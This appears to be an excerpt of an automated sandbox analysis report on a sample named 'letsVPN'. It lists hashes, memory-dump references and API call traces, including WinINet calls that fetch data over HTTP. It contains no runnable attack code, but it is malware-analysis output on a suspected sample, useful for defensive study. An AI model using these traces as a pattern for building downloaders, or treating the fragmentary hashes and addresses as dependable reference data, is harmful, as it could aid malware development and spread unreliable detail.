                                                                                                                                                                                                    • Instruction ID: f4cbb9994f2192c02038a558b7f24809a3cbc7a7a85d0f49fb9528de59c6dda1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1129323249D885EB9FCA2F90023DC7659E38DBC0F448025AA46877C5DE29C6998342
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread__addlocaleref_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 144977139-0
                                                                                                                                                                                                    • Opcode ID: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction ID: dd0f1f0c231c5fc80c7439be1b3e8a88326aa7477beda5119a12924904dd7238
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0BB30205E48C6FBDBAB21C8143E951819B4C7E1F44C624B5294A3D2FE688B5D8360
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _amsg_exit_getptd$Ex_nolock_getptd_noexit_updatetlocinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3801014656-0
                                                                                                                                                                                                    • Opcode ID: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction ID: d4aacb6000a69ceffea1ebe97908f6bebd0b7ae2b0ac0e702d7cc498c4538d71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F0303161190882FBDAAB5588427E82269EB4CBC4F0C8235FA18473D2DF148748C711
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 1773999731-1018135373
                                                                                                                                                                                                    • Opcode ID: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction ID: c175b3ae7acb65c193fc889e73e4d0c379e904474d6a669c45e4c9de5337dc13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C301863650268989EBA2AF31C8817EC23A4FB4DBDDF189131FE094A745CF30CA88D340

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:0%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:53.5%
                                                                                                                                                                                                    Total number of Nodes:71
                                                                                                                                                                                                    Total number of Limit Nodes:1

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003730C2
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003730E9
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037310C
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373178
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373198
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 003731B5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 003731D8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 003731E9
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 003731FF
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,Function_00001D40), ref: 0037321F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00373226
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037324D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037325E
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(?,00372082), ref: 00374DB9
                                                                                                                                                                                                      • Part of subcall function 00374DB0: ??3@YAXPAX@Z.MSVCR120(00375490,?,00372082), ref: 00374DC4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003732AC
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003732B8
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003732C4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 003729ED
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372A10
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00372A4A
                                                                                                                                                                                                      • Part of subcall function 003729A0: GetCurrentThreadId.KERNEL32 ref: 00372A84
                                                                                                                                                                                                      • Part of subcall function 003729A0: GetTickCount.KERNEL32 ref: 00372AA4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AC1
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372AE4
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AF5
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372B05
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372B10
                                                                                                                                                                                                      • Part of subcall function 003729A0: OutputDebugStringA.KERNEL32(00000000,?), ref: 00372B2E
                                                                                                                                                                                                      • Part of subcall function 003729A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372B3D
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 00372182
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 0037219F
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 003721C8
                                                                                                                                                                                                      • Part of subcall function 00372110: memset.MSVCR120 ref: 003721F1
                                                                                                                                                                                                      • Part of subcall function 00372110: InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0037221B
                                                                                                                                                                                                      • Part of subcall function 00372110: printf.MSVCR120 ref: 0037222A
                                                                                                                                                                                                    • InternetOpenW.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00373335
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00373358
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 0037336A
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373389
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003733AC
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003733E6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373424
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 0037342D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000BC), ref: 00373464
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037347A
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373483
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,OpenSession m_hSession = ), ref: 0037349D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120 ref: 003734AA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 003734B7
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003734D8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003734E9
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00373537
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00373543
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037354F
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00372C77
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00372C99
                                                                                                                                                                                                      • Part of subcall function 00372C50: InternetSetOptionW.WININET(00000000,00000006,00057E40,00000004), ref: 00372CA8
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 0037359B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003735AD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003735CC
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003735EF
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373629
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373667
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373670
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000C2), ref: 003736A7
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003736BD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 003736C6
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,Connect m_hConnect = ), ref: 003736E0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(00000010), ref: 003736EE
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 003736FB
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037371C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037372D
                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000008,GET,?,00000000,00000000,00000000,844C8200), ref: 0037377E
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 003737A2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003737B4
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003737D3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003737F6
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373830
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037386E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373877
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000C8), ref: 003738AE
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003738C4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 003738CD
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,OpenRequest m_hRequest = ), ref: 003738E7
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 003738F5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373902
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373923
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00373934
                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00373963
                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(?,?,00000000,20000000), ref: 00373971
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00373992
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003739A4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • HttpSendRequestW.WININET(?,00000000,00000000,?,?), ref: 003739BF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003739CD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003739EF
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373A12
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373A4C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373A8B
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?,?), ref: 00373AC2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 00373AD4
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373AF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373B16
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373B50
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373B8E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373B97
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000DF), ref: 00373BCE
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373BE4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373BED
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,SendRequest m_hRequest = ), ref: 00373C07
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 00373C15
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373C22
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373C49
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373C7F
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373CA2
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373CDC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373D1A
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373D23
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000E4), ref: 00373D5A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373D70
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373D79
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,EndRequest m_hRequest = ), ref: 00373D93
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 00373DA1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373DAE
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373DCF
                                                                                                                                                                                                      • Part of subcall function 00372F00: HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372F5C
                                                                                                                                                                                                      • Part of subcall function 00372F00: HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372FAF
                                                                                                                                                                                                      • Part of subcall function 00372F00: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,-00000002), ref: 00372FED
                                                                                                                                                                                                      • Part of subcall function 00372F00: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372FF6
                                                                                                                                                                                                      • Part of subcall function 00372F00: ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 00373003
                                                                                                                                                                                                      • Part of subcall function 00372F00: ??3@YAXPAX@Z.MSVCR120(?), ref: 00373015
                                                                                                                                                                                                      • Part of subcall function 00372760: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372773
                                                                                                                                                                                                      • Part of subcall function 00371100: ??3@YAXPAX@Z.MSVCR120(?,?,00372E5A,?,00000000,00000000,0039DCC0,00000000,00000001,?,-00000002,000000FF,?,00000000,00000000), ref: 0037110B
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373E59
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373F20
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373F71
                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000), ref: 00373FE2
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 003740EB
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003740FD
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00374119
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 0037412B
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037416D
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00374190
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003741CA
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 0037420C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00374229
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00374249
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 00374266
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 00374289
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037429A
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003742AA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003742BE
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003742EE
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374337
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037435A
